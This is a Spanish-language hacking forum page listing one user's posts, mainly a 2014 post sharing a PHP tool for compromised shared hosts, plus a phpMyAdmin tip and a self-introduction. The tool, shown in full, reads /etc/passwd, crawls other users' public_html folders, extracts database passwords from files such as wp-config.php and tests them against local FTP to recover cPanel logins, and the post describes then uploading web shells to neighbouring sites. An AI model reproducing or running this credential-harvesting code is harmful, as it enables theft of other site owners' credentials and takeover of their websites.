Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - josemi

Páginas 1 2
#21
Bugs y Exploits / Cpanel FtpHack and bypass directorios
Julio 25, 2014, 10:15:20 AM
buenas, aquí le dejo esta herramienta muy util para sacar muchos hackedhost en mis tiempo era una tool private del foto  [email protected]  :-[ a según ese foro lo defaceraon y por ahí subieron todas las tool private (googleen xD)

solo necesitas subirla algún hackedhost y ejecutarlo.. el sistema empezara a buscar las clave de cpanel del host ademas también publica directorio "bypasseable" es decir si en ese host hay varias pagina alojada te da el directorio de dicha web por ejemplo "home/$underc0de/public_html/" entonces por medio de shell entramos en ese directorio.. En caso que tengamos permisos de escritura podemos subir shell por ahí en caso que no entonces hay que revisar que cms usa editar el config.php y subir la shell


espero que aun funcione..  esta herramienta me fue muy útil  :'(

Código: php
<?php
echo "<html>";
echo "<title>[email protected]</title><body>";

set_time_limit(0);
##################
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
   echo "[-] Error : coudn't read /etc/passwd";
   exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
  $str=fgets($passwd);
  if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
        if (is_readable($dirz)) {
            array_push($users,$username);
            array_push($path_to_public,$dirz);
        }
    }
  }
  $i++;
}
###################

#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";

echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";

echo "[~] Searching for passwords in config.* files...\n\n";
foreach ($users as $user) {
        $path="/home/$user/public_html/";
        read_dir($path,$user);
}

echo "\n[+] Done\n";

function read_dir($path,$username) {
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
              $fpath="$path$file";
              if (($file!='.') and ($file!='..')) {
                 if (is_readable($fpath)) {
                    $dr="$fpath/";
                    if (is_dir($dr)) {
                       read_dir($dr,$username);
                    }
                    else {
                         if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
                            $pass=get_pass($fpath);
                            if ($pass!='') {
                               echo "[+] $fpath\n$pass\n";
                               ftp_check($username,$pass);
                            }
                         }
                    }
                 }
              }
        }
    }
}

function get_pass($link) {
    @$config=fopen($link,'r');
    while(!feof($config)) {
        $line=fgets($config);
        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
            if (strrpos($line,'"'))
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
            else
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
            return $pass;
        }
    }
}

function ftp_check($login,$pass) {
     @$ftp=ftp_connect('127.0.0.1');
     if ($ftp) {
        @$res=ftp_login($ftp,$login,$pass);
        if ($res) {
           echo '[Cpanel Found !!!] '.$login.':'.$pass."  Success\n";
        }
        else ftp_quit($ftp);
     }
}

echo "</textarea><br>";

echo "</body></html>";
?>
#22
Dudas y pedidos generales / Re:[Ayuda]Crear usuario y tabla en Phpmyadmin y que solo pueda ver eso
Julio 24, 2014, 10:37:46 AM
lo que tienes que hacer es configurar bien los privilegios de usuarios en la parte de Administración revisa el check  "SHOW DATABASES"  ;)
#23
Presentaciones y cumpleaños / El nuevo ni tan nuevo xD
Julio 24, 2014, 10:24:47 AM
hola soy josemi de vnzla,  me acabo de registrar,espero poder seguir ampliando mis conocimientos en el área de seguridad y servidores , hace años andaba en este "mundo de foros" y aprendí mucho sobre todo en  underlatino (Megabyte)  c-group (_AntraX_) diosdelared (0o_zeus_o0) y remoteexecution,  creo que me registre en este grupo pero ya ni recuerdo que nick tenia jaja pero por lo estudios me tuve que alejar ya ha pasado 7 años alejado de esto espero no estar tan "quemado" jajaja así que comienzo de nuevo espero que todo siga igual de fino como antes y espero poder estar mas activo en esta comunidad :D,  saludos
Páginas 1 2